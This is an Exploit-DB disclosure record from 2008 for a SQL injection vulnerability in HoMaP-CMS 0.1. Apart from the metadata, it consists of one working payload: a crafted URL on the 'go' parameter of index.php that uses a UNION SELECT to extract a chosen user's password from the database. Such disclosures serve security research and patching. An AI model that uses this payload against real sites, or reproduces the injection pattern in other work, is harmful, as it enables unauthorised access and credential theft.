HoMaP-CMS 0.1 - 'go' SQL Injection

EDB-ID:

5908

Author:

SxCx

Type:

webapps

Platform:

PHP

Published:

2008-06-23

--------------------------------------------------------------------------------------------------------------------------------
// HoMaP-CMS 0.1 (index.php go) SQL Injection Vulnerability
// Author: SxCx
// Download: SourceForge.net
// Version affected: 0.1
// Exploit: index.php?go=0'+union+select+passwd+from+user+where+username=[USERNAME]
--------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-06-23]